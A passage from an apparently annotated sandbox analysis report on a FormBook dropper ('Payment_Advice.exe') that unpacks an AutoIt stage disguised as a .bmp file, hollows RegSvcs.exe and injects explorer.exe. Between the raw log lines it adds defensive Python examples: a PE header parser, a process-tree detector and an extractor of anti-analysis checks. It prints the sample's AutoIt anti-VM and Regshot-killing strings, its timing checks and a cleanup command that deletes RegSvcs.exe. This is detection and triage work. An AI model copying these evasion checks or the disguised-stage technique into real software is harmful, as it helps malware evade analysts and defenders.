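        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), rva, vsize))

    def section_of(rva):
        return next((n for n, start, size in sections if start <= rva < start + size), None)

    return {
        "dll_characteristics": [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit],
        "sections": [n for n, _, _ in sections],
        "directories": {DATA_DIRECTORIES.get(i, f"DIRECTORY_{i}"): section_of(rva)
                        for i, (rva, size) in enumerate(dirs) if rva and size},
    }


def build_sample_header() -> bytes:
    """Constructed PE32 header (not the real sample): six sections including the
    MSVC delay-load section .didat, the four flags the report lists, and six
    populated data directories placed in the sections the report names."""
    sections = [(b".text", 0x1000, 0x40000), (b".rdata", 0x41000, 0x10000),
                (b".data", 0x51000, 0x4000), (b".didat", 0x55000, 0x1000),
                (b".rsrc", 0x56000, 0x80000), (b".reloc", 0xD6000, 0x3000)]
    directories = {1: (0x41500, 0x200), 2: (0x56000, 0x80000), 5: (0xD6000, 0x3000),
                   6: (0x41400, 0x1C), 10: (0x41700, 0xA8), 12: (0x41000, 0x400)}
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew: PE header follows the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<H", opt, 70, 0x0040 | 0x0100 | 0x4000 | 0x8000)
    struct.pack_into("<I", opt, 92, 16)                   # NumberOfRvaAndSizes
    for idx, (rva, size) in directories.items():
        struct.pack_into("<II", opt, 96 + 8 * idx, rva, size)
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n.ljust(8, b"\0"), vsize, rva, vsize, 0, 0, 0, 0, 0, 0x40000040)
                    for n, rva, vsize in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs


if __name__ == "__main__":
    for key, value in parse_pe(build_sample_header()).items():
        print(f"{key}: {value}")
```

For a real file, call parse_pe(open(path, "rb").read()). Note what these flags mean for triage here: DYNAMIC_BASE, NX_COMPAT and GUARD_CF describe the WinRAR SFX stub (the sfxrar.pdb path above), not the AutoIt stage or the FormBook payload it carries, so a hardened header on the outer file says nothing about the inner stages.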
          Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_0051F640 push ecx; ret 0_2_0051F653
          Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_0051EB78 push eax; ret 0_2_0051EB96
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001C0330 push edi; ret 6_2_001C0333
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_00190E06 push ecx; ret 6_2_00190E19
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_0018DBFE push eax; iretd 6_2_0018DC01
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00417191 push ebp; retf 14_2_004171B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_004169B2 push cs; iretd 14_2_00416AB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0040E270 push 38B96F61h; retf 14_2_0040E287
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00416A2C push cs; iretd 14_2_00416AB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0041D475 push eax; ret 14_2_0041D4C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0040E422 push FFFFFFC1h; retf 14_2_0040E42A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0041D4C2 push eax; ret 14_2_0041D4C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0041D4CB push eax; ret 14_2_0041D532
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0041D52C push eax; ret 14_2_0041D532
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00416ED7 pushad ; iretd 14_2_00416EDF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0041DF7D push dword ptr [F81DAF74h]; ret 14_2_0041E493
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_016A225F pushad ; ret 14_2_016A27F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_016A27FA pushad ; ret 14_2_016A27F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_016D09AD push ecx; mov dword ptr [esp], ecx 14_2_016D09B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_016A283D push eax; iretd 14_2_016A2858
          Source: C:\Windows\explorer.exe | Code function: 15_2_1019A9B5 push esp; retn 0000h 15_2_1019AAE7
          Source: C:\Windows\explorer.exe | Code function: 15_2_1019AB1E push esp; retn 0000h 15_2_1019AB1F
          Source: C:\Windows\explorer.exe | Code function: 15_2_1019AB02 push esp; retn 0000h 15_2_1019AB03
          Source: C:\Windows\explorer.exe | Code function: 15_2_106A0B02 push esp; retn 0000h 15_2_106A0B03
          Source: C:\Windows\explorer.exe | Code function: 15_2_106A0B1E push esp; retn 0000h 15_2_106A0B1F
          Source: C:\Windows\explorer.exe | Code function: 15_2_106A09B5 push esp; retn 0000h 15_2_106A0AE7
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A571ED push ecx; ret 16_2_00A57200
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A5722B push ecx; ret 16_2_00A5723E
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_0375225F pushad ; ret 16_2_037527F9
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037527FA pushad ; ret 16_2_037527F9
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_037809AD push ecx; mov dword ptr [esp], ecx 16_2_037809B6
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_00175D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
          Source: Payment_Advice.exe | Static PE information: section name: .didat
          Source: C:\Users\user\Desktop\Payment_Advice.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6359531
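The process creations in this section describe a single chain: the WinRAR SFX drops ewdbwwfpdh.bmp into RarSFX0, that file runs as a process and starts RegSvcs.exe (the process-hollowing host flagged in the signature list), explorer.exe then starts a SysWOW64 cmd.exe, and that cmd.exe runs ipconfig /renew and a cmd /c del of RegSvcs.exe. The following is an added example, not Joe Sandbox code, that turns those parent/child links into detection logic over Sysmon-style process-creation records. SAMPLE_EVENTS is constructed (PIDs invented, images and command lines as listed above); the extension, utility and parent allowlists are assumptions to tune, not values from the report.

```python
"""Process-tree triage for the execution chain listed in this report.

Added example, not Joe Sandbox code.  SAMPLE_EVENTS are constructed
Sysmon-style process-creation records (invented PIDs; image paths and
command lines as listed in the report); the sets below are assumptions a
detection engineer would tune, not values taken from the report.
"""
import ntpath  # Windows path semantics regardless of the host OS

DATA_FILE_EXTENSIONS = {".bmp", ".jpg", ".jpeg", ".png", ".gif", ".icm", ".txt", ".pdf"}
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}
DOTNET_HOST_PARENTS = {"msbuild.exe", "devenv.exe", "msiexec.exe"}       # assumption: benign launchers
NETWORK_UTILITIES = {"ipconfig.exe", "netsh.exe", "nslookup.exe", "arp.exe", "netstat.exe"}

SAMPLE_EVENTS = [  # constructed records; PIDs are invented
    {"pid": 100, "ppid": 1,   "image": r"C:\Users\user\Desktop\Payment_Advice.exe", "cmdline": "Payment_Advice.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"},
    {"pid": 400, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\SysWOW64\cmd.exe", "cmdline": r"C:\Windows\SysWOW64\cmd.exe"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\SysWOW64\ipconfig.exe", "cmdline": "ipconfig /renew"},
    {"pid": 700, "ppid": 500, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'},
]


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def triage_process_events(events: list) -> list:
    """Return one finding string per suspicious parent/child relationship."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image, cmd = _base(e["image"]), e["cmdline"].lower()
        parent = by_pid.get(e["ppid"])
        parent_image = _base(parent["image"]) if parent else "<unknown>"
        ext = ntpath.splitext(image)[1]

        # 1. A file with a data-file extension running as a process: the SFX drops
        #    its next stage as ewdbwwfpdh.bmp and executes it anyway.
        if ext in DATA_FILE_EXTENSIONS:
            findings.append(f"executable masquerading as {ext}: {e['image']} (parent {parent_image})")

        # 2. A .NET framework utility started by something outside the build/installer
        #    toolchain: the hollowing host seen in this report.
        if image in DOTNET_HOSTS and parent_image not in DOTNET_HOST_PARENTS:
            findings.append(f"{image} started by {parent_image}: candidate process-hollowing host")

        # 3. explorer.exe -> cmd.exe -> network utility, i.e. the injected explorer
        #    stage driving "ipconfig /renew" through a SysWOW64 cmd.exe.
        if image in NETWORK_UTILITIES and parent_image == "cmd.exe":
            grandparent = by_pid.get(parent["ppid"])
            if grandparent and _base(grandparent["image"]) == "explorer.exe":
                findings.append(f"explorer.exe -> cmd.exe -> {e['cmdline']}: injected-explorer child")

        # 4. cmd /c del of a binary under C:\Windows: clean-up of the hollowed host.
        if image == "cmd.exe" and "/c del" in cmd and "\\windows\\" in cmd:
            findings.append(f"deletion of a Windows binary: {e['cmdline']}")
    return findings


if __name__ == "__main__":
    for line in triage_process_events(SAMPLE_EVENTS):
        print(line)
```

Rule 3 is the one worth keeping strict: explorer.exe spawning cmd.exe on its own is everyday user activity, so the rule only fires on the full three-step chain ending in a network utility, which is the shape the "System process connects to network" and "Uses ipconfig" signatures above point at.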

          Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
          Source: C:\Users\user\Desktop\Payment_Advice.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp
          Source: C:\Users\user\Desktop\Payment_Advice.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE6
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_002025A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_0018FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
          Source: C:\Users\user\Desktop\Payment_Advice.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match | File source: Process Memory Space: ewdbwwfpdh.bmp PID: 6052, type: MEMORYSTR
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1603300172.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540709138.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1602379290.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, fjrpidauk.jpg.0.dr | Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
          Source: ewdbwwfpdh.bmp, 00000006.00000002.1607737663.000000000100B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601630284.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1604570490.000000000100A000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601873902.0000000001008000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601782208.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1603782046.000000000100A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: REGSHOT.EXESM5
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, fjrpidauk.jpg.0.dr | Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
          Source: ewdbwwfpdh.bmp, 00000006.00000002.1607737663.000000000100B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601630284.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1604570490.000000000100A000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601873902.0000000001008000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601782208.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1603782046.000000000100A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: REGSHOT.EXE
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540709138.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000002.1607113781.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1603533350.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN(
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 0000000002B59904 second address: 0000000002B5990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 0000000002B59B6E second address: 0000000002B59B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
          Source: C:\Windows\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Windows\explorer.exe TID: 4788 | Thread sleep time: -10078000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4788 | Thread sleep time: -9796000s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe TID: 4932 | Thread sleep count: 170 > 30
          Source: C:\Windows\SysWOW64\cmd.exe TID: 4932 | Thread sleep time: -340000s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe TID: 4932 | Thread sleep count: 9802 > 30
          Source: C:\Windows\SysWOW64\cmd.exe TID: 4932 | Thread sleep time: -19604000s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 5039
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 4898
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 879
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 873
          Source: C:\Windows\SysWOW64\cmd.exe | Window / User API: threadDelayed 9802
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | API coverage: 4.6 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | API coverage: 1.6 %
          Source: C:\Windows\SysWOW64\cmd.exe | API coverage: 0.8 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00409AA0 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
          Source: C:\Users\user\Desktop\Payment_Advice.exe | API call chain: ExitProcess graph end node
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VMwaretray.exe") Then"
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VboxService.exe") Then
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rocessExists("VboxService.exe") Then
          Source: explorer.exe, 0000000F.00000003.2284163967.0000000009330000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1603167171.0000000000F53000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareUser.exe5FB536C7S
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1603167171.0000000000F53000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareService.exe
          Source: fjrpidauk.jpg.0.dr | Binary or memory string: If ProcessExists("VMwaretray.exe") Then
          Source: fjrpidauk.jpg.0.dr | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
          Source: explorer.exe, 0000000F.00000002.3842529276.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00=
          Source: explorer.exe, 0000000F.00000002.3856158250.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.0000000009255000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwaretray.exeteM8
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenU6
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenU68
          Source: explorer.exe, 0000000F.00000002.3856158250.00000000091FB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 0000000F.00000002.3856158250.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: fjrpidauk.jpg.0.dr | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
          Source: explorer.exe, 0000000F.00000003.2284163967.0000000009255000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 0000000F.00000002.3856158250.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then&
          Source: explorer.exe, 0000000F.00000002.3842529276.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 0000000F.00000003.2284163967.0000000009255000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTcaVMWare
          Source: uaabfk.icm.0.dr | Binary or memory string: hF2gsx3i60QuAB24U6xnv008E1r8PTZi58o47x15qEmU8532NW553R2YdA858l1lX8y8X8q119o03NZX84rTH02P5
          Source: fjrpidauk.jpg.0.dr | Binary or memory string: If ProcessExists("VboxService.exe") Then
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1603000018.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1603076190.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601700548.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1602242665.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VBoxTray.exe
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VboxService.exe
          Source: explorer.exe, 0000000F.00000002.3842529276.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601571668.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540709138.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VBoxTray.exe") Then
          Source: explorer.exe, 0000000F.00000003.2284163967.0000000009330000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: fjrpidauk.jpg.0.dr | Binary or memory string: If ProcessExists("VBoxTray.exe") Then
          Source: explorer.exe, 0000000F.00000002.3842529276.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
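The If ProcessExists(...) / DriveSpaceFree("d:\") < 1 / PROCESSCLOSE("REGSHOT.EXE") strings above are the AutoIt anti-analysis checks behind the "Yara detected AntiVM autoit script" signature: the script probes for VMware and VirtualBox guest-tools processes and for the Regshot registry-diffing tool, and kills Regshot if it is running. The explorer.exe strings (VMware SATA CD00, Hyper-V RAW) are the sandbox's own device names that happened to be in memory, not checks made by the sample. The following is an added example, not code from Joe Sandbox: it extracts those AutoIt calls from script text or memory-string dumps and classifies what they target. SAMPLE is reconstructed from the strings listed in this section, including one truncated fragment and one non-call string, and the classification table is an assumption.

```python
"""Extract AutoIt anti-analysis checks from script text or memory strings.

Added example, not part of the report.  SAMPLE is reconstructed from the
memory strings the report lists for this sample; TARGET_CLASSES is an
assumption mapping the probed process names to the product they belong to.
"""
import re

TARGET_CLASSES = {
    "vmwaretray.exe": "VMware", "vmwareuser.exe": "VMware", "vmwareservice.exe": "VMware",
    "vboxservice.exe": "VirtualBox", "vboxtray.exe": "VirtualBox",
    "regshot.exe": "analysis tool",
}

# AutoIt function names are case-insensitive, and the memory dumps above show
# the same calls both in source casing and upper-cased.
_CALL = re.compile(r'\b(ProcessExists|ProcessClose)\s*\(\s*"([^"]+)"\s*\)', re.IGNORECASE)
_SPACE = re.compile(r'\bDriveSpaceFree\s*\(\s*"([^"]+)"\s*\)\s*<\s*(\d+)', re.IGNORECASE)

SAMPLE = r'''
If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
If ProcessExists("VMwaretray.exe") Then
If ProcessExists("VboxService.exe") Then
If ProcessExists("VBoxTray.exe") Then
IF PROCESSEXISTS("REGSHOT.EXE") THEN
PROCESSCLOSE("REGSHOT.EXE")
rocessExists("VboxService.exe") Then
REGSHOT.EXESM5
'''


def extract_antivm_checks(text: str) -> dict:
    """Return probed processes (with class), killed processes, drive-space
    thresholds in MB, and the set of products the script is looking for."""
    probes, kills, space = {}, set(), {}
    for func, name in _CALL.findall(text):
        key = name.lower()
        if func.lower() == "processexists":
            probes[key] = TARGET_CLASSES.get(key, "unknown")
        else:
            kills.add(key)
    for drive, mb in _SPACE.findall(text):
        space[drive.lower()] = int(mb)          # AutoIt DriveSpaceFree reports megabytes
    return {
        "probes": probes,
        "kills": sorted(kills),
        "drive_space_mb": space,
        "verdict": sorted({cls for cls in probes.values() if cls != "unknown"}),
    }


if __name__ == "__main__":
    for key, value in extract_antivm_checks(SAMPLE).items():
        print(f"{key}: {value}")
```

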